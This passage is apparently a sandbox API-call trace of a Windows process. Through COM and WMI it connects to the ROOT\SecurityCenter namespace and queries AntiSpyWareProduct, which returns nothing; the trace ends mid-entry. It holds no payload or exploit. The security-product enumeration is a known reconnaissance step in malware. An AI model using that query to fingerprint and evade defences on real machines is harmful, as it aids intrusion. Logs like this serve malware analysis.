[0215.642] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f29c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f29c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.642] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768e48, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0215.642] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x18, pszText=0x0) returned 0x0 [0215.642] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f288*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f288*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.642] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0215.642] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0215.642] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0215.642] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.643] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x5e8d868) returned 0x0 [0215.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8d868, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x0) returned 0x80004002 [0215.643] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8d868, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e891b0) returned 0x0 [0215.643] WbemLocator:IUnknown:Release (This=0x5e8d868) returned 0x0 [0215.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e891b0) returned 0x0 [0215.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0215.644] WbemLocator:IUnknown:AddRef (This=0x5e891b0) returned 0x3 [0215.644] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0215.644] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0215.644] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0215.644] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0215.644] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0215.644] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0215.644] WbemLocator:IUnknown:Release (This=0x5e891b0) returned 0x2 [0215.644] WbemLocator:IUnknown:Release (This=0x5e891b0) returned 0x1 [0215.644] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0215.644] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0215.644] WbemLocator:IUnknown:QueryInterface (in: This=0x5e891b0, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e891b0) returned 0x0 [0215.644] WbemLocator:IUnknown:AddRef (This=0x5e891b0) returned 0x3 [0215.644] WbemLocator:IUnknown:Release (This=0x5e891b0) returned 0x2 [0215.644] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768e48, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0215.644] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x18, pszText=0x0) returned 0x0 [0215.644] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=8, puBuffLength=0x36f1f4*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f1f4*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.644] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e89190) returned 0x0 [0215.645] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e89190, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x792e78) returned 0x0 [0215.710] WbemLocator:IUnknown:QueryInterface (in: This=0x792e78, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x784ee4) returned 0x0 [0215.710] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784ee4, pProxy=0x792e78, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0215.710] WbemLocator:IUnknown:Release (This=0x784ee4) returned 0x1 [0215.710] WbemLocator:IUnknown:QueryInterface (in: This=0x792e78, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x784f04) returned 0x0 [0215.710] WbemLocator:IUnknown:QueryInterface (in: This=0x792e78, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x784ee4) returned 0x0 [0215.710] WbemLocator:IClientSecurity:SetBlanket (This=0x784ee4, pProxy=0x792e78, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.710] WbemLocator:IUnknown:Release (This=0x784ee4) returned 0x2 [0215.710] WbemLocator:IUnknown:Release (This=0x784f04) returned 0x1 [0215.710] CoTaskMemFree (pv=0x793f48) [0215.710] WbemLocator:IUnknown:AddRef (This=0x792e78) returned 0x2 [0215.711] WbemLocator:IUnknown:Release (This=0x5e89190) returned 0x0 [0215.711] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0215.711] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0215.711] WbemLocator:IUnknown:QueryInterface (in: This=0x792e78, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x784eec) returned 0x0 [0215.711] WbemLocator:IRpcOptions:Query (in: This=0x784eec, pPrx=0x5e8d880, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0215.711] WbemLocator:IUnknown:Release (This=0x784eec) returned 0x2 [0215.712] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0215.712] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0215.712] WbemLocator:IUnknown:QueryInterface (in: This=0x792e78, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x792e78) returned 0x0 [0215.712] WbemLocator:IUnknown:Release (This=0x792e78) returned 0x2 [0215.712] SysStringLen (param_1=0x0) returned 0x0 [0215.712] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0215.712] IWbemServices:ExecQuery (in: This=0x792e78, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f928) returned 0x0 [0215.715] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x70f92c) returned 0x0 [0215.715] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f0ac, pAuthzSvc=0x36f0a8, pServerPrincName=0x36f0a0, pAuthnLevel=0x36f0a4, pImpLevel=0x36f094, pAuthInfo=0x36f098, pCapabilites=0x36f09c | out: pAuthnSvc=0x36f0ac*=0xa, pAuthzSvc=0x36f0a8*=0x0, pServerPrincName=0x36f0a0, pAuthnLevel=0x36f0a4*=0x6, pImpLevel=0x36f094*=0x2, pAuthInfo=0x36f098, pCapabilites=0x36f09c*=0x1) returned 0x0 [0215.715] IUnknown:Release (This=0x70f92c) returned 0x1 [0215.715] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x784a54) returned 0x0 [0215.715] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f03c | out: ppvObject=0x36f03c*=0x70f92c) returned 0x0 [0215.715] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.717] IUnknown:Release (This=0x70f92c) returned 0x2 [0215.717] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0215.717] CoTaskMemFree (pv=0x794008) [0215.717] IUnknown:AddRef (This=0x70f928) returned 0x2 [0215.717] CoGetContextToken (in: pToken=0x36e57c | out: pToken=0x36e57c) returned 0x0 [0215.717] CoGetContextToken (in: pToken=0x36e98c | out: pToken=0x36e98c) returned 0x0 [0215.717] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x784a3c) returned 0x0 [0215.718] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8d730, dwProperty=2, pdwValue=0x36ea1c | out: pdwValue=0x36ea1c) returned 0x80004002 [0215.718] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0215.718] CoGetContextToken (in: pToken=0x36ef5c | out: pToken=0x36ef5c) returned 0x0 [0215.718] CoGetContextToken (in: pToken=0x36eebc | out: pToken=0x36eebc) returned 0x0 [0215.718] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef8c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee58 | out: ppvObject=0x36ee58*=0x70f928) returned 0x0 [0215.718] IUnknown:Release (This=0x70f928) returned 0x2 [0215.718] SysStringLen (param_1=0x0) returned 0x0 [0215.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768e48, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0215.718] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x18, pszText=0x0) returned 0x0 [0215.718] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f24c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f24c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.718] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0215.719] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70f9f0) returned 0x0 [0215.720] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70f9f4) returned 0x0 [0215.720] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0215.720] IUnknown:Release (This=0x70f9f4) returned 0x1 [0215.720] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x7850e4) returned 0x0 [0215.720] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70f9f4) returned 0x0 [0215.720] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.721] IUnknown:Release (This=0x70f9f4) returned 0x2 [0215.721] WbemLocator:IUnknown:Release (This=0x7850e4) returned 0x1 [0215.721] CoTaskMemFree (pv=0x794038) [0215.722] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0215.722] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0215.722] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0215.722] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x7850cc) returned 0x0 [0215.722] WbemLocator:IRpcOptions:Query (in: This=0x7850cc, pPrx=0x5e8d928, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0215.722] WbemLocator:IUnknown:Release (This=0x7850cc) returned 0x2 [0215.722] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0215.722] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0215.723] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70f9f0) returned 0x0 [0215.723] IUnknown:Release (This=0x70f9f0) returned 0x2 [0215.723] SysStringLen (param_1=0x0) returned 0x0 [0215.723] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0215.724] CoTaskMemAlloc (cb=0x4) returned 0x5e89220 [0215.724] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89220, puReturned=0x246a80c | out: apObjects=0x5e89220*=0x0, puReturned=0x246a80c*=0x0) returned 0x1 [0215.724] CoTaskMemFree (pv=0x5e89220) [0215.724] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.725] IUnknown:Release (This=0x70f9f0) returned 0x1 [0215.725] IUnknown:Release (This=0x70f9f0) returned 0x0 [0215.725] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.725] IUnknown:Release (This=0x70f928) returned 0x1 [0215.725] IUnknown:Release (This=0x70f928) returned 0x0 [0215.726] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0215.727] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0215.727] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0215.727] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.727] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x5e89220) returned 0x0 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89220, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0215.728] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89220, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x768eb8) returned 0x0 [0215.728] WbemDefPath:IUnknown:Release (This=0x5e89220) returned 0x0 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x768eb8) returned 0x0 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0215.728] WbemDefPath:IUnknown:AddRef (This=0x768eb8) returned 0x3 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0215.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x5e891e0) returned 0x0 [0215.728] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e891e0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.728] WbemDefPath:IUnknown:Release (This=0x5e891e0) returned 0x3 [0215.728] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0215.729] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0215.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0215.729] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x2 [0215.729] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x1 [0215.729] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0215.729] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0215.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x768eb8) returned 0x0 [0215.729] WbemDefPath:IUnknown:AddRef (This=0x768eb8) returned 0x3 [0215.729] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x2 [0215.729] WbemDefPath:IWbemPath:SetText (This=0x768eb8, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768eb8, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x18, pszText=0x0) returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f29c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f29c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768eb8, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x18, pszText=0x0) returned 0x0 [0215.729] WbemDefPath:IWbemPath:GetText (in: This=0x768eb8, lFlags=4, puBuffLength=0x36f288*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f288*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.729] CoGetObjectContext (in: 